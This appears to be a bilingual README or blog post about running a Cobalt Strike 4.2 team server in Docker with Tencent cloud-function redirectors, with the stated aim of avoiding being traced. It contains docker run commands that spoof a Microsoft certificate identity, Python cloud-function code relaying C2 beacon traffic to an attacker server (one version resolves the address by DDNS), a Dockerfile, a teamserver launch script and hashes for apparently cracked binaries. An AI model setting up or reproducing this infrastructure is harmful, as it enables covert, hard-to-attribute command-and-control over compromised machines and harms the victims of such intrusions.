CobaltStrike 4.2 Cloud function and Docker

Introduce

Thanks

CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。
使用云函数,避免被溯源
使用docker 容器,快速方便
使用我写的python脚本,避免意外泄漏

Cobattstrike is a platform wide multi-party collaborative post penetration attack framework based on Java. Cobaltstrike integrates port forwarding, port scanning, socket proxy, privilege raising, phishing, remote control Trojan horse and other functions. The tool almost covers all the technical links needed in APT attack chain.
Use cloud function to avoid being traced
Using docker container is fast and convenient
Use my Python script to avoid accidental leakage

Quickly create

Amd64

如果要使用云函数,必须采用容器内部端口443
If you want to use cloud functions, you must use port 443 inside the container

docker run -it \
--rm \
-e passwd="e9PrFYtrPFD2U" \
-e server_ip="1.1.1.1?" \
-e server_port=94831? \
-e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \
-p 94831?:94831? \
-p 94831?:94831?/udp \
-p 33009?:443 \
-p 33009?:443/udp \
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:4.2-tgb
# xrsec/cobaltstrike:4.2-tgb

Arm64

如果要使用云函数,必须采用容器内部端口443
If you want to use cloud functions, you must use port 443 inside the container

docker run -it \
--rm \
-e passwd="e9PrFYtrPFD2U" \
-e server_ip="1.1.1.1?" \
-e server_port=94831? \
-e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \
-p 94831?:94831? \
-p 94831?:94831?/udp \
-p 33009?:443 \
-p 33009?:443/udp \
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:Arm-4.2-tgb
# xrsec/cobaltstrike:Arm-4.2-tgb

Preview

image-20210418024309077
image-20210418014246800
image-20210418131027332
image-20210418014707504
image-20210418045821032
image-20210418045911267

Basic information

这里并不要求80/443;原理:云函数数据 转发到 指定 的端口号,指定 的端口号把 数据 转发到 docker容器 的443/80 端口, 实现 免80/443

Please translate this passage by yourself

云函数服务 ==> 新建 ==> 自定义创建(函数名/地区 随意,python3.6,触发器自定义,版本: $LATEST,
函数代码选择下面这串,你改改还能用!,API网关触发,其他默认,勾选集成响应,Base64请各位小伙伴帮我测试一下)==>
完成 ==> API网关 ==> 服务 ==> 点击你创建的API ==> 通用API ==> 点击编辑 ==> 路径(设置为 /)==> 立即完成
云函数服务 ==> 点击你创建的API服务 ==> 触发管理 ==> 访问路径 ==> (访问 cs URL不需要后面的路径)

vps

# -*- coding: utf8 -*-
import json, requests, base64, re, os


def main_handler(event, context):
C2 = 'https://' + 【Fill in your IP address here】 + '【If your port is 80 or 443 then remove the following port and colon, otherwise like this【:18888】'
path = event['path']
ip = event['requestContext']['sourceIp']
headers = event['headers']
headers['X-Forwarded-For'] = ip
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
try:
if event['httpMethod'] == 'GET':
resp = requests.get(C2 + path, headers=headers, verify=False)
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
else:
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)

except:
print("腾讯云蜘蛛抓取异常,请检查json数据接口")
# or print("Tencent cloud spider crawling exception, please check the JSON data interface")
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
response = {
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
return response


Dynamic DNS(DDNS)

# -*- coding: utf8 -*-
import json, requests, base64, re, os, requests


def main_handler(event, context):
domain = "Fill in your domain name here"
# Do not format or delete comments
# 年轻人别格式化,别删我注释,谢谢🙏
print("############")
print("############")
print("############")
print("############")
print("############")
# If you use other DNS services you need your own live data format
web_status = requests.get("https://myssl.com/api/v1/tools/dns_query?qtype=1&host=%s&qmode=1"%domain,
verify=False, timeout=5)
print("############")
print("############")
print("############")
print("############")
print("############")
try:
myip = (web_status.json()["data"])["86"][0]["answer"]["records"][0]["value"]
print("############")
print("############")
print("############")
print("############")
print("############")
except:
if (web_status.json()["data"])["86"][0]["answer"]["records"] == "null":
print("Domain name wrong")
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
myip = (web_status.json()["data"])["86"][0]["answer"]["records"][0]["value"]
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
C2 = 'https://' + myip + ':13003'
path = event['path']
ip = event['requestContext']['sourceIp']
headers = event['headers']
headers['X-Forwarded-For'] = ip
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
try:
if event['httpMethod'] == 'GET':
resp = requests.get(C2 + path, headers=headers, verify=False)
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
else:
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)

except:
print("腾讯云蜘蛛抓取异常,请检查json数据接口")
# or print("Tencent cloud spider crawling exception, please check the JSON data interface")
print("############")
print("############")
print("############")
print("############")
print("############")
print("############")
response = {
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
return response

image-20210418041414557
image-20210418041520770
image-20210418041316551
image-20210418041615304

Tree

MD5 如果需要自行编译请准备好

.
|-- CobaltStrike
| |-- cobaltstrike.auth
| |-- CobaltStrike.jar
| |-- cs.profile
| |-- Main.java
| |-- readme.txt
| |-- start
| |-- teamserver
| |-- third-party
| | |-- README.winvnc.txt
| | |-- winvnc.x64.dll
| | `-- winvnc.x86.dll
| |-- update
| `-- update.jar
|-- cs.tar
`-- Dockerfile

Dockerfile

FROM centos:latest

COPY CobaltStrike /CobaltStrike
COPY Dockerfile /CobaltStrike

RUN yum update -y \
&& yum upgrade -y \
&& yum install wget vim curl nc ncurses -y \
&& wget -O /tmp/jdk-16_linux-x64_bin.rpm https://download.oracle.com/otn-pub/java/jdk/16+36/7863447f0ab643c585b9bdebf67c69db/jdk-16_linux-x64_bin.rpm?AuthParam=1618677469_64467fc21b22b64b529fbba6a4d6f2ca \
&& rpm -ivh /tmp/jdk-16_linux-x64_bin.rpm \
&& rm /tmp/jdk-16_linux-x64_bin.rpm \
&& chmod 777 /CobaltStrike/teamserver

ENV server_ip 127.0.0.1
ENV server_port 50050
ENV aliasname "Bing Wallpaper"
ENV dname "CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US"
STOPSIGNAL SIGWINCH

EXPOSE 50050
CMD ["/CobaltStrike/teamserver"]

teamserver

#!/bin/bash
#
# Start Cobalt Strike Team Server
#

# make pretty looking messages (thanks Carlos)

#################

clear
echo -e "\033[1;31m _____ _ _ _ _____ _ _ _ \033[0m"
echo -e "\033[1;32m / __ \ | | | || | / ___|| | (_)| | \033[0m"
echo -e "\033[1;33m | / \/ ___ | |__ __ _ | || |_ \ \`--. | |_ _ __ _ | | __ ___ \033[0m"
echo -e "\033[1;34m | | / _ \ | '_ \ / _\` || || __| \`--. \| __|| '__|| || |/ / / _ \ \033[0m"
echo -e "\033[1;35m | \__/\| (_) || |_) || (_| || || |_ /\__/ /| |_ | | | || < | __/ \033[0m"
echo -e "\033[1;36m \____/ \___/ |_.__/ \__,_||_| \__|\____/ \__||_| |_||_|\_\ \___| \033[0m"
echo -e "\033[1;34m -------------- \033[0m"
echo -e "\033[1;31m __ __ ____ \033[0m"
echo -e "\033[1;32m \ \/ / | _ \ ___ ___ ___ \033[0m"
echo -e "\033[1;33m \ / | |_) | / __| / _ \ / __| \033[0m"
echo -e "\033[1;34m / \ | _ < \__ \ | __/ | (__ \033[0m"
echo -e "\033[1;35m /_/\_\ |_| \_\ |___/ \___| \___| \n\033[0m"
echo -e "\033[1;34m -------------- \033[0m"
echo -e "\033[1;31m __ __ _____ _____ _____ \033[0m"
echo -e "\033[1;32m \ \ / / / ____| | __ \ / ____| \033[0m"
echo -e "\033[1;33m \ \ /\ / / | | __ | |__) | | (___ ___ ___ \033[0m"
echo -e "\033[1;34m \ \/ \/ / | | |_ | | ___/ \___ \ / _ \ / __| \033[0m"
echo -e "\033[1;35m \ /\ / | |__| | | | ____) | | __/ | (__ \033[0m"
echo -e "\033[1;36m \/ \/ \_____| |_| |_____/ \___| \___| \n\033[0m"
echo -e "\033[1;31m\tThank's 北美第一突破手 && WgpSec \n\033[0m"
echo -e "\033[1;32m\t[ help ] \n\033[0m"
echo -e "\033[1;35m\t[ https://github.com/wgpsec ] \033[0m"
echo -e "\033[1;34m\t[ https://mp.weixin.qq.com/s/6nBrRJHFFpCw4N90n8aURA ] \033[0m"
echo -e "\033[1;33m\t[ https://blog.zygd.site/CobaltStrike%204.2%20Cloud%20function%20and%20Docker.html ] \n\033[0m"



#################

function print_good () {
echo -e "\x1B[01;32m[+]\x1B[0m $1"
}

function print_error () {
echo -e "\x1B[01;31m[-]\x1B[0m $1"
}

function print_info () {
echo -e "\x1B[01;34m[*]\x1B[0m $1"
}

# check that we're r00t
if [ $UID -ne 0 ]; then
print_error "Superuser privileges are required to run the team server"
exit
fi

# check if java is available...
if [ $(command -v java) ]; then
true
else
print_error "java is not in \$PATH"
echo " is Java installed?"
exit
fi

# check if keytool is available...
if [ $(command -v keytool) ]; then
true
else
print_error "keytool is not in \$PATH"
echo " install the Java Developer Kit"
exit
fi

# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e /CobaltStrike/cobaltstrike.store ]; then
print_info "Will use existing X509 certificate and keystore (for SSL)"
else
print_info "Generating X509 certificate and keystore (for SSL)"
IFS_BACKUP=$IFS
IFS=$(echo -en "\n\b")
keytool -keystore /CobaltStrike/cobaltstrike.store -storepass $passwd -keypass $passwd -genkey -keyalg RSA -alias "$aliasname" -dname "$dname"
IFS=$IFS_BACKUP
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=$server_port -Djavax.net.ssl.keyStore=/CobaltStrike/cobaltstrike.store -Djavax.net.ssl.keyStorePassword=$passwd -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath /CobaltStrike/CobaltStrike.jar server.TeamServer $server_ip $passwd /CobaltStrike/cs.profile


Some advice

image-20210418032116087

MD5

0ce2f55444e4793516b5afe967be9255  CobaltStrike.jar
e6816d52fdc288de669d18e824262787 CobaltStrike/teamserver
077e75003bb749ecf240685e8f3c6cf9 cobaltstrike.auth
082182cf2f4b2c6ccdd9f2ae41350a1b cs.profile
# 由于 java 下载链接会变,所以Dockerfile 值不一样
# On Arm
35403e17d4a7eae15a1a4482b1ed841c Dockerfile
# On Amd
c9fcc45150176c6e097f29934a05b7f7 Dockerfile

Thanks

北美第一突破手 && WgpSec